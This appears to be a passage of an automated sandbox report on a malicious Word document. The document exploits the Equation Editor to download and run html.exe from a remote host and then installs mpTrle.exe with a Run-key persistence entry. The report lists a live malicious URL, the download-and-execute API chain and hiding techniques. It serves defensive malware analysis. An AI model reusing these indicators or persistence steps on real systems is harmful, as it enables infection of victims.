                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, HpK0UKqYTXMkNldgkl.csHigh entropy of concatenated method names: 'lbGAFX8UUh', 'NGEAmKFdac', 'VCrA6dwFQ6', 'FACADN6uk2', 'jutABwb9K4', 'puUAaWwScP', 'XieAJA7ufc', 'cYNUHZHhQY', 'U0dUs1aLBs', 'IrpUwkWRTH'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, BLOAyHyYSiUZUlxD9k.csHigh entropy of concatenated method names: 'PX0V9CtgVk', 'eS1VNRQh9X', 'LmwVY5vbYS', 'ERkVTAcsCl', 'Gj7VMFViKJ', 'WA0VnxbCYa', 'hLfVc6Jki3', 'LscVKJjLvv', 'J8KVEgoRDY', 'WQSVODqTjE'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, zHtxCJ1N2JoO48Z6lI.csHigh entropy of concatenated method names: 'OGTG2Ght1E', 'ddhG50ueeN', 'ToString', 'zHHGDd9YpT', 'zWRGB8iwOh', 'PJFGkRTxGi', 'mbkGa0whWA', 'EoFGJbYNQY', 'lraGxylQAo', 'vrcGoHBw7s'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, J38WN0MuLBWdDdXjtWo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uEwZrb5DAM', 'NtUZQiG1kG', 'QwFZdmNvQ0', 'kSuZeDupbq', 'HL2ZyB4HNI', 'HxTZqfwGh1', 'ugGZHDX7xH'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, O12eRO598n0U73Lpkf.csHigh entropy of concatenated method names: 'zrGJfDk0FH', 'VXjJB4JmrI', 'yu1Jap9Rr7', 'kolJxOAD4J', 'HecJowBvsI', 'VHxaywAt3h', 'mMWaq2edhS', 'LCTaHTcm4q', 'ikDasicJMB', 'inrawZ13ok'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, udHJLbJbS6nBCo8rlA.csHigh entropy of concatenated method names: 'Dispose', 'NELFwrbqWp', 'k1ORTg5VMs', 'jb5vvpb8Yp', 'og3Firus1T', 'b6dFz6oR6d', 'ProcessDialogKey', 'xbaRC78q29', 'eAgRFZODXk', 'bUMRRWavoA'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, uqwCXNwbcnMqM8iwfa.csHigh entropy of concatenated method names: 'UANUDVPPrB', 'a5bUBCEr9d', 'K2XUk1Zlvy', 'KSvUaUwMh2', 'py7UJginwy', 'wv1UxR7V5E', 'tD7UoxvDwY', 'HYGUStojtp', 'LcHU26kFqU', 'xLAU55dxLu'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, sqh1bsK2vmbKu3bQAB.csHigh entropy of concatenated method names: 'YOhmfdii8W', 'UUcmDiqBva', 's07mBv3J2t', 'NYfmkxvuiJ', 'pwXma7TJBL', 'lh6mJp0TDL', 'SHdmxQyV6j', 'iq6mou4qT8', 'YgxmSQUYSe', 'gxtm2TOB9u'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, jBDgLqMLPkY7tSbGPhJ.csHigh entropy of concatenated method names: 'UbkA8ULCYc', 'GAIAjHkMHE', 'QHdA48iXuW', 'qXMAgthhYo', 'mYuAuZIvLM', 'TdNAPcme8P', 'BmkAt2Joed', 'zPoA9HjHPV', 'lHiANABDTT', 'WyYAXuRUpR'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, OrnLL9jIcMuvJxc1rQ.csHigh entropy of concatenated method names: 'UmIx8QbjjA', 'VCYxjXon6U', 'XABx47BWUG', 'ShtxgB0U62', 'nHrxuVthfm', 'VjaxPQGXpm', 'EQcxtG3LYP', 'fT3x9KKs5V', 'KbaxN38aOR', 'okGxX0sWwN'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, PcBFR2elvHTvWr6EEl.csHigh entropy of concatenated method names: 'kA4FxQoxrD', 'luVFosHmNS', 'uFkF2SPtJs', 'vqxF5Vltel', 'XOVF7bB7V9', 'TV2FW9A7DQ', 'YaIloHVSSArgSTFZUG', 'CbEZQfntQjCbJUg9yA', 'Ev0FFAQnkC', 'dReFmlejo7'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, JmsVQYzgcRFt7cT77K.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCOAVKvFXb', 'mckA7XpmIr', 'LtNAWyaBtw', 'HDVAGSlNmt', 'j4rAUtwTby', 'xHhAAkNrk9', 'Tk0AZj0QKX'
                      Source: 9.2.html.exe.3bf41c0.11.raw.unpack, SKNwGsNRwam5llK5t6.csHigh entropy of concatenated method names: 'vBeBr8LZD6', 'PsKBQhgKqq', 'ihJBdmbEb6', 'oxuBewBsvC', 'jKRByn7kxv', 'pKDBqp2hum', 'MhOBHtnVv2', 'IF5Bsspd5p', 'jYEBw3TNWk', 'LX7BijH1ap'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\wbze.de\DavWWWRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\wbze.de\DavWWWRootJump to behavior
                      Source: settings.xml.relsExtracted files from sample: http://wbze.de/u7xc
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood[1].doc.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 48255FE9.doc.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_0361062C LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_0361062C
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\html[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\html.exeFile created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\html.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\html.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mpTrleJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mpTrleJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\AppData\Roaming\html.exeFile opened: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
